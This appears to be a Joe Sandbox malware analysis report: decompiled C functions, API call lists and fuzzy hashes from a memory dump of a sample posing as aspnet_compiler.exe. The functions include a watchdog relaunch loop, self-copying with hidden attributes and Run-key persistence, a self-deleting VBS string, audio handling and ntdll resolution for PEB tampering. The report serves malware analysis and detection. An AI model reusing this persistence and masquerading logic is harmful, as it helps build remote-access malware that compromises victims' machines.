                • String ID: ")$.vbs$82G$@-G$On Error Resume Next$P2G$P2G$P2G(PF$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                • API String ID: 3797177996-790292332
                • Opcode ID: 812a73662d2ae2c81f1c773ab16f3723da55641552efd4e9ac92a0c1c4c0f5f1
                • Instruction ID: 6e45ccf0452d088d16b27cf02e05fcd52a39cd31be9773de80b43fbe075aaa7b
                • Opcode Fuzzy Hash: 812a73662d2ae2c81f1c773ab16f3723da55641552efd4e9ac92a0c1c4c0f5f1
                • Instruction Fuzzy Hash: F7817F716043405BC718FB62D8929AF73E9AF90308F10493FB546A71E2EE7C9D49C69E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004119B8 Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 190synchronizationsleepfileCOMMON
                Download Yara Rule
                C-Code - Quality: 91%
                			E004119B8() {
				long _v8;
				char _v32;
				short _v556;
				short _v1076;
				short _v1596;
				CHAR* _t24;
				void* _t26;
				void* _t27;
				void* _t30;
				int _t32;
				long _t38;
				int _t40;
				int _t42;
				long _t51;
				int _t53;
				void* _t56;
				int _t58;
				void* _t69;
				int _t71;
				int _t72;
				int _t73;
				long _t74;
				void* _t112;
				void* _t114;
				void* _t116;
				void* _t119;

				_v8 = _t74;
				_t24 = E00401F8B(0x473370);
				_t72 = 0;
				if(CreateMutexA(0, 1, _t24) != 0) {
					_t26 = E0040245C();
					_t27 = E00401F8B(0x473280);
					_t30 = E004129E0(E00401F8B(0x473238), "exepath",  &_v556, 0x208, _t27, _t26);
					_t119 = _t119 + 0x14;
					if(_t30 != 0) {
						E004020BF(0,  &_v32);
						_t32 = E0041ADFE( &_v32);
						_push(0);
						__eflags = _t32;
						if(_t32 == 0) {
							L2:
							ExitProcess();
						}
						CreateFileW( &_v556, 0x80000000, 1, 0, 3, 0x80, ??);
						_t114 = OpenProcess(0x100000, 0, _v8);
						WaitForSingleObject(_t114, 0xffffffff);
						CloseHandle(_t114);
						_t38 = GetCurrentProcessId();
						_t40 = E00412B5F(0x473238, E00401F8B(0x473238), "WDH", _t38);
						__eflags = _t40;
						if(_t40 == 0) {
							goto L1;
						}
						_t112 = ShellExecuteW;
						do {
							_t42 = PathFileExistsW( &_v556);
							__eflags = _t42;
							_t43 =  &_v556;
							if(_t42 != 0) {
								L13:
								ShellExecuteW(_t72, L"open", _t43, _t72, _t72, 1);
								L14:
								do {
									_t73 = E00412831(E00401F8B(0x473238), "WD",  &_v8);
									__eflags = _t73;
									if(_t73 == 0) {
										Sleep(0x1f4);
									} else {
										E00412C91(E00401F8B(0x473238), __eflags, "WD");
									}
									__eflags = _t73;
								} while (_t73 == 0);
								goto L19;
							}
							_t56 = E0040245C();
							E00401F8B( &_v32);
							_t58 = E0041AD6A(_t56,  &_v556, _t72);
							__eflags = _t58;
							if(_t58 == 0) {
								E00435760(_t112,  &_v1596, _t72, 0x208);
								_t119 = _t119 + 0xc;
								GetTempPathW(0x104,  &_v1596);
								GetTempFileNameW( &_v1596, L"temp_", _t72,  &_v1076);
								lstrcatW( &_v1076, L".exe");
								_t69 = E0040245C();
								E00401F8B( &_v32);
								_t71 = E0041AD6A(_t69,  &_v1076, _t72);
								__eflags = _t71;
								if(_t71 == 0) {
									goto L14;
								}
								_t43 =  &_v1076;
								goto L13;
							}
							_t43 =  &_v556;
							goto L13;
							L19:
							_t72 = 0;
							_t116 = OpenProcess(0x100000, 0, _v8);
							WaitForSingleObject(_t116, 0xffffffff);
							CloseHandle(_t116);
							_t51 = GetCurrentProcessId();
							_t53 = E00412B5F(0x473238, E00401F8B(0x473238), "WDH", _t51);
							__eflags = _t53;
						} while (_t53 != 0);
						goto L1;
					}
					_push(0);
					goto L2;
				}
				L1:
				_push(1);
				goto L2;
			}





























                0x004119c3
                0x004119cc
                0x004119d4
                0x004119df
                0x004119f0
                0x004119f8
                0x00411a1d
                0x00411a22
                0x00411a27
                0x00411a2f
                0x00411a3d
                0x00411a42
                0x00411a43
                0x00411a45
                0x004119e3
                0x004119e3
                0x004119e3
                0x00411a5d
                0x00411a72
                0x00411a77
                0x00411a7e
                0x00411a84
                0x00411a99
                0x00411aa0
                0x00411aa2
                0x00000000
                0x00000000
                0x00411aa8
                0x00411aae
                0x00411ab5
                0x00411abb
                0x00411abd
                0x00411ac3
                0x00411b79
                0x00411b84
                0x00411b86
                0x00411b8b
                0x00411ba2
                0x00411ba6
                0x00411ba8
                0x00411bc5
                0x00411baa
                0x00411bb8
                0x00411bbd
                0x00411bcb
                0x00411bcb
                0x00000000
                0x00411b8b
                0x00411ace
                0x00411ad8
                0x00411ae1
                0x00411ae8
                0x00411aea
                0x00411b04
                0x00411b09
                0x00411b18
                0x00411b32
                0x00411b44
                0x00411b55
                0x00411b5f
                0x00411b68
                0x00411b6f
                0x00411b71
                0x00000000
                0x00000000
                0x00411b73
                0x00000000
                0x00411b73
                0x00411aec
                0x00000000
                0x00411bcf
                0x00411bd2
                0x00411be0
                0x00411be5
                0x00411bec
                0x00411bf2
                0x00411c0a
                0x00411c11
                0x00411c11
                0x00000000
                0x00411c19
                0x00411a29
                0x00000000
                0x00411a29
                0x004119e1
                0x004119e1
                0x00000000

                APIs
                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,00473298,00000003), ref: 004119D7
                • ExitProcess.KERNEL32(00000000), ref: 004119E3
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00411A5D
                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00411A6C
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411A77
                • CloseHandle.KERNEL32(00000000), ref: 00411A7E
                • GetCurrentProcessId.KERNEL32 ref: 00411A84
                • PathFileExistsW.SHLWAPI(?), ref: 00411AB5
                • GetTempPathW.KERNEL32(00000104,?), ref: 00411B18
                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411B32
                • lstrcatW.KERNEL32(?,.exe), ref: 00411B44
                  • Part of subcall function 0041AD6A: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0046A8F0,00000000,00000000,0040C902,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041ADA9
                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411B84
                • Sleep.KERNEL32(000001F4), ref: 00411BC5
                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00411BDA
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411BE5
                • CloseHandle.KERNEL32(00000000), ref: 00411BEC
                • GetCurrentProcessId.KERNEL32 ref: 00411BF2
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                • String ID: .exe$82G$82G$82G$WDH$exepath$open$p3G$temp_
                • API String ID: 2649220323-3724276308
                • Opcode ID: 36fa0cd5316c0336f567b1fe0e2be110fb0e7f0c24547f9761ebfc999ec6a06b
                • Instruction ID: 22e993795ca5e5f4b94ea2bece14d6f4ece3e8e9738639780bf53f9b9ba412ff
                • Opcode Fuzzy Hash: 36fa0cd5316c0336f567b1fe0e2be110fb0e7f0c24547f9761ebfc999ec6a06b
                • Instruction Fuzzy Hash: D251F871A043157BDB10A7A0AC99EEF336C9B04715F1001BBF905A72D2EF789E858A5D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040C307 Relevance: 42.2, APIs: 12, Strings: 12, Instructions: 203fileCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E0040C307(char __ecx, void* __edx, void* __eflags, WCHAR* _a4, char _a8, char _a12) {
				char _v24;
				char _v28;
				void* _v32;
				char _v48;
				char _v49;
				char _v52;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t22;
				void* _t23;
				WCHAR* _t28;
				int _t29;
				void* _t35;
				WCHAR* _t43;
				int _t45;
				int _t48;
				WCHAR* _t54;
				int _t55;
				void* _t70;
				void* _t130;
				void* _t131;
				void* _t135;

				_t135 =  &_v56;
				_t130 = __edx;
				_v49 = __ecx;
				_t22 = E0043A3D6(__edx);
				_t139 = _t22;
				if(_t22 == 0) {
					_t73 = _a4;
					_t125 = _v49;
					_t23 = E0040CF38( &_v24, _v49, _a4);
					_t131 = 0x473220;
					E00401EF3(0x473220, _v49, 0x473220, _t23);
				} else {
					CreateDirectoryW(E00401EE4(0x473250), 0);
					_t73 = _a4;
					_t125 = E004087F0( &_v24, 0x473250, 0x473250, "\\");
					_t70 = E00402FF4(_a4,  &_v48, _t69, _t130, 0x473250, _t139, _t73);
					_t131 = 0x473220;
					E00401EF3(0x473220, _t69, 0x473220, _t70);
					E00401EE9();
				}
				E00401EE9();
				if(E0043E224(E00401EE4(_t131), 0x470b38, _t26) != 0) {
					_t28 = E00401EE4(_t131);
					_t134 = CopyFileW;
					_t29 = CopyFileW(0x470b38, _t28, 0);
					__eflags = _t29;
					if(_t29 != 0) {
						L14:
						_push(E00401EE4(0x473208));
						E0040C21B(0x473208);
						__eflags = _a8 - 1;
						if(_a8 == 1) {
							_t43 = E00401EE4(_t131);
							_t73 = SetFileAttributesW;
							SetFileAttributesW(_t43, 7);
							_t45 = E0043A3D6(_t130);
							__eflags = _t45;
							if(_t45 != 0) {
								SetFileAttributesW(E00401EE4(0x473250), 7);
							}
						}
						__eflags = _a12;
						if(_a12 != 0) {
							E0040415E(_t73, _t135 - 0x1c, _t125, _t134, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe");
							_push(L"del");
							E00412AFC(0x80000001, E00401EE4(E0041A7B9( &_v28, 0x473238)));
							E00401EE9();
						}
						CloseHandle( *0x470d44);
						_t35 = ShellExecuteW(0, L"open", E00401EE4(_t131), 0x46a8f0, 0x46a8f0, 1);
						__eflags = _t35 - 0x20;
						if(_t35 > 0x20) {
							ExitProcess(0);
						} else {
							E0040C577();
							L13:
							return 0;
						}
					}
					__eflags = _v49 - 0x36;
					if(_v49 == 0x36) {
						goto L14;
					}
					_t48 = E0043A3D6(_t130);
					_t125 = 0x36;
					__eflags = _t48;
					if(_t48 == 0) {
						E00401EF3(_t131, 0x36, _t131, E0040CF38( &_v24, 0x36, _t73));
					} else {
						E00401EF3(0x473250, 0x36, _t131, E0040CF38( &_v24, 0x36, _t130));
						E00401EE9();
						_t125 = E004087F0( &_v52, 0x473250, CopyFileW, "\\");
						E00401EF3(_t131, _t60, _t131, E00402FF4(_t73,  &_v28, _t60, _t130, CopyFileW, __eflags, _t73));
						E00401EE9();
					}
					E00401EE9();
					CreateDirectoryW(E00401EE4(0x473250), 0);
					_t54 = E00401EE4(_t131);
					_t73 = 0x470b38;
					_t55 = CopyFileW(0x470b38, _t54, 0);
					__eflags = _t55;
					if(_t55 != 0) {
						goto L14;
					} else {
						L004086CB(0x470b38, _t131, _t125, 0x470b38);
						goto L13;
					}
				} else {
					_push(E00401EE4(0x473208));
					E0040C21B(0x473208);
					return 1;
				}
			}




























                0x0040c307
                0x0040c30e
                0x0040c310
                0x0040c315
                0x0040c320
                0x0040c322
                0x0040c36e
                0x0040c376
                0x0040c37b
                0x0040c381
                0x0040c389
                0x0040c324
                0x0040c32e
                0x0040c334
                0x0040c34a
                0x0040c350
                0x0040c356
                0x0040c35e
                0x0040c367
                0x0040c367
                0x0040c392
                0x0040c3ae
                0x0040c3d1
                0x0040c3d8
                0x0040c3de
                0x0040c3e0
                0x0040c3e2
                0x0040c4a7
                0x0040c4b1
                0x0040c4b3
                0x0040c4b8
                0x0040c4bf
                0x0040c4c5
                0x0040c4ca
                0x0040c4d1
                0x0040c4d4
                0x0040c4da
                0x0040c4dc
                0x0040c4eb
                0x0040c4eb
                0x0040c4dc
                0x0040c4ed
                0x0040c4f2
                0x0040c4fe
                0x0040c503
                0x0040c524
                0x0040c530
                0x0040c530
                0x0040c53b
                0x0040c559
                0x0040c55f
                0x0040c562
                0x0040c570
                0x0040c564
                0x0040c564
                0x0040c4a0
                0x00000000
                0x0040c4a0
                0x0040c562
                0x0040c3e8
                0x0040c3ed
                0x00000000
                0x00000000
                0x0040c3f4
                0x0040c3f9
                0x0040c400
                0x0040c402
                0x0040c461
                0x0040c404
                0x0040c411
                0x0040c41a
                0x0040c434
                0x0040c443
                0x0040c44c
                0x0040c451
                0x0040c46a
                0x0040c47c
                0x0040c486
                0x0040c48c
                0x0040c492
                0x0040c494
                0x0040c496
                0x00000000
                0x0040c498
                0x0040c49b
                0x00000000
                0x0040c49b
                0x0040c3b0
                0x0040c3ba
                0x0040c3bc
                0x00000000
                0x0040c3c3

                APIs
                • _wcslen.LIBCMT ref: 0040C315
                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00473298,0000000B,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040C32E
                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000,00000000,00000000,00000000,?,00473298,0000000B,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040C3DE
                • _wcslen.LIBCMT ref: 0040C3F4
                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040C47C
                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000000,00000000), ref: 0040C492
                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040C4D1
                • _wcslen.LIBCMT ref: 0040C4D4
                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040C4EB
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00473298,0000000B), ref: 0040C53B
                • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000001), ref: 0040C559
                • ExitProcess.KERNEL32 ref: 0040C570
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                • String ID: 2G$ 2G$6$82G$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$P2G$P2G$P2G$P2G$P2G$del$open
                • API String ID: 1579085052-2098281891
                • Opcode ID: 65248ef6e73eb4e28b7d54744e4bb54038e4efd798751719faaa7fc6d2eeb99b
                • Instruction ID: 2a47eddb00df912b126377051a92c71841ea904bf6b40c506a6d22bed5b78104
                • Opcode Fuzzy Hash: 65248ef6e73eb4e28b7d54744e4bb54038e4efd798751719faaa7fc6d2eeb99b
                • Instruction Fuzzy Hash: 3E51C461204340ABD614B7B2EC92A7F2399AF90708F10843FF805A62D3DF7C9D0592AF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00419BA2 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E00419BA2(void* __ecx, void* __edx, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* _v128;
				char _v176;
				char _v192;
				void* _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				void* _t26;
				void* _t41;
				long _t45;
				void* _t61;
				void* _t65;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t114;

				_t101 = __edx;
				_t114 =  &_v124;
				_t108 = __ecx;
				_t110 = __edx;
				if(E00419DF7( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t61 = E00401EE4( &_a4);
					_t101 = 0x30;
					E00401EF3( &_a4, 0x30, _t110, E0040CF38( &_v124, 0x30, _t61));
					E00401EE9();
				}
				_t23 = E0040245C();
				_t119 = _t23;
				if(_t23 == 0) {
					__eflags = PathFileExistsW(E00401EE4( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00402073(_t65, _t114 - 0x18, _t101, _t112, 0x464074);
						_push(0xa8);
						E00404A81(0x4738d0, _t101, __eflags);
					}
				} else {
					E0041AE6B(_t110, E00401EE4( &_a4));
					L4:
					_t26 = E0041A7B9( &_v28, _t108);
					_t106 = E00402F85( &_v124, E00402FF4(_t65,  &_v76, E0040AEF6( &_v52, L"open \"", _t112,  &_a4), _t108, _t112, _t119, L"\" type "), _t26);
					E00402FF4(_t65,  &_v100, _t30, _t108, _t112, _t119, L" alias audio");
					E00401EE9();
					E00401EE9();
					E00401EE9();
					E00401EE9();
					mciSendStringW(E00401EE4( &_v100), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E00402073(0, _t114 - 0x18, _t30, _t112, 0x464074);
					_push(0xa9);
					E00404A81(0x4738d0, _t106, 0);
					_t41 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x472acc = _t41;
						while(1) {
							_t121 = _t41;
							if(_t41 == 0) {
								break;
							}
							__eflags =  *0x472ac9;
							if( *0x472ac9 != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x472ac9 = 0;
							}
							__eflags =  *0x472ac8;
							if( *0x472ac8 != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x472ac8 = 0;
							}
							mciSendStringA("status audio mode",  &_v176, 0x14, 0);
							_t45 = E0043E5D0( &_v192, "stopped");
							__eflags = _t45;
							if(_t45 == 0) {
								SetEvent( *0x472acc);
							}
							__eflags = WaitForSingleObject( *0x472acc, 0x1f4);
							if(__eflags != 0) {
								_t41 =  *0x472acc;
							} else {
								CloseHandle( *0x472acc);
								_t41 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00402073(0, _t115 - 0x18, _t106, 0x4738d0, 0x464074);
						_push(0xaa);
						E00404A81(0x4738d0, _t106, _t121);
						E00401EE9();
						goto L19;
					}
				}
				L19:
				return E00401EE9();
			}


























                0x00419ba2
                0x00419ba2
                0x00419baa
                0x00419bac
                0x00419bbe
                0x00419bc7
                0x00419bcd
                0x00419be1
                0x00419bea
                0x00419bea
                0x00419bf1
                0x00419bfd
                0x00419bff
                0x00419cef
                0x00419cf1
                0x00000000
                0x00419cf7
                0x00419d01
                0x00419d06
                0x00419d10
                0x00419d10
                0x00419c05
                0x00419c0e
                0x00419c13
                0x00419c1e
                0x00419c58
                0x00419c5e
                0x00419c68
                0x00419c71
                0x00419c7a
                0x00419c83
                0x00419c97
                0x00419cab
                0x00419cad
                0x00419cb8
                0x00419cc2
                0x00419cc9
                0x00419cd3
                0x00419cd9
                0x00419cd9
                0x00419cd9
                0x00419da7
                0x00419da7
                0x00419da9
                0x00000000
                0x00000000
                0x00419d1a
                0x00419d20
                0x00419d2a
                0x00419d2c
                0x00419d2c
                0x00419d32
                0x00419d38
                0x00419d42
                0x00419d44
                0x00419d44
                0x00419d57
                0x00419d63
                0x00419d6a
                0x00419d6c
                0x00419d74
                0x00419d74
                0x00419d8b
                0x00419d8d
                0x00419da2
                0x00419d8f
                0x00419d95
                0x00419d9b
                0x00000000
                0x00419d9b
                0x00419d8d
                0x00419db7
                0x00419dc1
                0x00419dc9
                0x00419dce
                0x00419dd5
                0x00419dde
                0x00000000
                0x00419dde
                0x00419cd9
                0x00419de3
                0x00419df6

                APIs
                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00419C97
                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419CAB
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00464074), ref: 00419CD3
                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00472EC8,00000000), ref: 00419CE9
                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419D2A
                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00419D42
                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00419D57
                • SetEvent.KERNEL32 ref: 00419D74
                • WaitForSingleObject.KERNEL32(000001F4), ref: 00419D85
                • CloseHandle.KERNEL32 ref: 00419D95
                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419DB7
                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00419DC1
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                • API String ID: 738084811-1354618412
                • Opcode ID: b956aa6423b5bcbcb2845cea5496d9274bc1e9175a2476133d7623f69dfd2c96
                • Instruction ID: 455b6cfaa5a4d4cea25ac99553b3555d96430d1d1c5ac1129c3b59e21b3d00b1
                • Opcode Fuzzy Hash: b956aa6423b5bcbcb2845cea5496d9274bc1e9175a2476133d7623f69dfd2c96
                • Instruction Fuzzy Hash: 8751C5712442056FD214F761EC92EAF369DEB80348F10443FF546A21E2EE789D898A6F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E00401A4D(WCHAR* __ecx, signed int __edx) {
				void _v4;
				void _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				long _v28;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x470aaa & 0x0000ffff;
				_t83 = ( *0x470ab6 & 0x0000ffff) * _t80;
				_v16 = 1;
				_v20 = 0x10;
				_v12 = _t83 *  *0x470aac >> 3;
				asm("cdq");
				_v8 = _t83 + (__edx & 0x00000007) >> 3;
				_t5 =  &(_t75[1]); // 0x0
				_t36 =  *_t5 * _t80;
				_v4 = _t36;
				_v24 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					_push(0);
					WriteFile(_t81, "RIFF", 0, 4,  &_v28);
					WriteFile(_t81,  &_v24, 0,  &_v28, 0);
					WriteFile(_t81, "WAVE", 0,  &_v28, 0);
					WriteFile(_t81, "fmt ", 0,  &_v28, 0);
					WriteFile(_t81,  &_v20, 0,  &_v28, 0);
					WriteFile(_t81,  &_v16, 2,  &_v28, 0);
					WriteFile(_t81, 0x470aaa, 2,  &_v28, 0);
					WriteFile(_t81, 0x470aac, 0,  &_v28, 0);
					WriteFile(_t81,  &_v12, 0,  &_v28, 0);
					WriteFile(_t81,  &_v8, 2,  &_v28, 0);
					WriteFile(_t81, 0x470ab6, 2,  &_v28, 0);
					WriteFile(_t81, "data", 0,  &_v28, 0);
					WriteFile(_t81,  &_v4, 0,  &_v28, 0);
					_t28 =  &(_t75[1]); // 0x0
					WriteFile(_t81,  *_t75,  *_t28,  &_v28, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}















                0x00401a5a
                0x00401a5d
                0x00401a66
                0x00401a74
                0x00401a8a
                0x00401a95
                0x00401a9b
                0x00401aa4
                0x00401aa8
                0x00401aab
                0x00401aae
                0x00401ab5
                0x00401abf
                0x00401ac4
                0x00401ad7
                0x00401ae3
                0x00401af3
                0x00401b03
                0x00401b13
                0x00401b23
                0x00401b34
                0x00401b45
                0x00401b55
                0x00401b65
                0x00401b76
                0x00401b87
                0x00401b97
                0x00401ba7
                0x00401bb0
                0x00401bb6
                0x00401bb9
                0x00000000
                0x00401bbf
                0x00000000

                APIs
                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                • WriteFile.KERNEL32(00000000,00470AAA,00000002,00000000,00000000), ref: 00401B45
                • WriteFile.KERNEL32(00000000,00470AAC,00000004,00000000,00000000), ref: 00401B55
                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                • WriteFile.KERNEL32(00000000,00470AB6,00000002,00000000,00000000), ref: 00401B87
                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$Write$Create
                • String ID: RIFF$WAVE$data$fmt
                • API String ID: 1602526932-4212202414
                • Opcode ID: e9244d672c59e0ffd74479715dd62bb2a6f89e2f1e0128d42166dc8543c173f0
                • Instruction ID: bbc7d4a3c977ff0e2710d2a536ed23c0b0e069a4161f47bce29e1ad9506f00c9
                • Opcode Fuzzy Hash: e9244d672c59e0ffd74479715dd62bb2a6f89e2f1e0128d42166dc8543c173f0
                • Instruction Fuzzy Hash: 8D412EB2654318BAE210DE51DD85FBB7EECEB85B50F40441AFA44D60C0D7A4E909DBB3
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004068E4 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004068E4() {
				_Unknown_base(*)()* _t4;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()* _t15;
				WCHAR* _t17;

				_t17 = L"ntdll.dll";
				_t4 = GetProcAddress(GetModuleHandleW(_t17), "RtlInitUnicodeString");
				 *0x470afc = _t4;
				if(_t4 != 0) {
					_t6 = GetProcAddress(GetModuleHandleW(_t17), "NtAllocateVirtualMemory");
					 *0x470b00 = _t6;
					if(_t6 == 0) {
						goto L1;
					}
					_t9 = GetProcAddress(GetModuleHandleW(_t17), "NtFreeVirtualMemory");
					 *0x470b0c = _t9;
					if(_t9 == 0) {
						goto L1;
					}
					_t11 = GetProcAddress(GetModuleHandleW(_t17), "RtlAcquirePebLock");
					 *0x470b04 = _t11;
					if(_t11 == 0) {
						goto L1;
					}
					_t13 = GetProcAddress(GetModuleHandleW(_t17), "RtlReleasePebLock");
					 *0x470b10 = _t13;
					if(_t13 == 0) {
						goto L1;
					}
					_t15 = GetProcAddress(GetModuleHandleW(_t17), "LdrEnumerateLoadedModules");
					 *0x470af8 = _t15;
					return 0 | _t15 != 0x00000000;
				}
				L1:
				return 0;
			}










                0x004068ec
                0x00406901
                0x00406903
                0x0040690a
                0x00406919
                0x0040691b
                0x00406922
                0x00000000
                0x00000000
                0x0040692d
                0x0040692f
                0x00406936
                0x00000000
                0x00000000
                0x00406941
                0x00406943
                0x0040694a
                0x00000000
                0x00000000
                0x00406955
                0x00406957
                0x0040695e
                0x00000000
                0x00000000
                0x00406969
                0x0040696d
                0x00000000
                0x00406977
                0x0040690c
                0x00000000

                APIs
                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000001,00406CC1,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000003,00406CE9,00473220,00406D42), ref: 004068F8
                • GetProcAddress.KERNEL32(00000000), ref: 00406901
                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 00406916
                • GetProcAddress.KERNEL32(00000000), ref: 00406919
                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 0040692A
                • GetProcAddress.KERNEL32(00000000), ref: 0040692D
                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 0040693E
                • GetProcAddress.KERNEL32(00000000), ref: 00406941
                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00406952
                • GetProcAddress.KERNEL32(00000000), ref: 00406955
                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 00406966
                • GetProcAddress.KERNEL32(00000000), ref: 00406969
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
